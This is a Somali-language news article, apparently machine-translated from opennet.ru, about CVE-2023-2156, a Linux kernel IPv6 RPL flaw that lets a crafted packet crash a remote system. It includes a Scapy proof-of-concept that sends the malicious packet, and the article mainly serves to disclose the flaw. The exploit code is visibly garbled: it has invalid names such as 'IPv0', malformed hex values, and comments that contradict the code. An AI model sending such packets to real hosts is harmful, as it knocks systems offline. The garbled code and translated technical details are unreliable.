0-maalin Linux IPV6 nuglaanta xirmada taas oo u ogolaaneysa shil kernel fog

Macluumaad ku saabsan dayacanka (0-maalin) aan la daboolin (CVE-2023-2156) ee ku jira kernel Linux kaas oo u oggolaanaya joojinta nidaamka adoo soo diraya xirmo IPV6 ah oo si gaar ah loo farsameeyay. Dhibaatadu waxay soo baxdaa kaliya marka taageerada nidaamka RPL (Routing Protocol for Low-Power and Lossy Networks) la furo, kaas oo si caadi ah u naafo ah qaybinta oo loo isticmaalo inta badan qalabka ku xiran ee ka shaqeeya shabakadaha wireless-ka oo leh khasaaro baakidh sare leh.

Nuglaanta waxaa sababa si khaldan u maaraynta xogta dibadeed ee ku jirta xeerka hab-maamuuska ee RPL, kaas oo horseeda guul-darro cad iyo kernel-ku galo xaalad argagax leh. Marka la dhigayo xogta la helay iyadoo ay sabab u tahay kala saarida madaxa baakidhka IPv6 RPL qaab dhismeedka k_buff (Socket Buffer), haddii goobta CmprI loo dejiyay 15, goobta Segleft waxaa loo dejiyay 1, CmprEna waxaa loo dejiyay 0, 48- byte address vector waxaa laga soo saaray 528 bytes iyo xaalad ah in aanay jirin xasuus ku filan oo loo qoondeeyay kaydinta. Xaaladdan oo kale, shaqada skb_push ee loo isticmaalo in lagu riixo xogta qaab-dhismeedka ayaa dab qabadsiinaysa hubinta cabbirka xogta iyo kaydiyaha, taas oo dhalinaysa xaalad argagax leh si looga hortago in dib loo qoro kaydiyaha.

Ka faa'iidayso tusaale ahaan: # Waxaan u isticmaali doonaa Scapy si aan u farsamaynno baakidhka laga soo dejiyo. Dhammaan soo dejinta * socket socket # Isticmaal IPv6 ka LAN interface kaaga DST_ADDR = sys.argv[1] SRC_ADDR = DST_ADDR # Waxaan isticmaalnaa saldhigyada si aan u dirno xirmada sockfd = socket.socket loola dhaqmo sidii ciwaanka la isku riixay # Segleft = 6 si loo kiciyo cod-weyneysiinta # lastentry = 3xf3 dhigaysa CmprI ilaa 15 iyo CmprE ilaa 1 p = IPv0(src=SRC_ADDR, dst=DST_ADDR) / IPv0ExtHdrSegmentRouting(nooca=15, ciwaanka=["a0) :", "a6::", "a6::"], segleft=3, lastentry=8xf7) # Soo dir xirmadan sharka ah sockfd.sendto(bytes(p), (DST_ADDR, 6))

Waxaa xusid mudan in soosaarayaasha kernel-ka la ogeysiiyay dayacanka Janaayo 2022 iyo 15kii bilood ee la soo dhaafay waxay isku dayeen inay xaliyaan dhibaatada seddex jeer iyagoo siidaayay balastar Sebtembar 2022, Oktoobar 2022 iyo Abriil 2023, laakiin mar kasta oo hagaajintu ma dhicin. ku filan oo nuglaanta ayaa awooday inay soo baxdo. Ugu dambeyntii, mashruuca ZDI, oo isku dubariday shaqada si loo baabi'iyo dayacanka, ayaa go'aansaday in uu shaaca ka qaado macluumaad faahfaahsan oo ku saabsan dayacanka, iyada oo aan la sugin xirmo shaqo oo ka soo baxa kernel-ka.

Sidaa darteed, baylahdu weli waa mid aan la daboolin. Marka lagu daro balastarka lagu daray kernel-ka 6.4-rc2 ma aha mid waxtar leh. Isticmaalayaasha waxaa lagula talinayaa inay xaqiijiyaan in nidaamka RPL aan loo isticmaalin nidaamkooda, taas oo lagu samayn karo sysctl -a | grep -i rpl_seg_enabled

Source: opennet.ru

Add a comment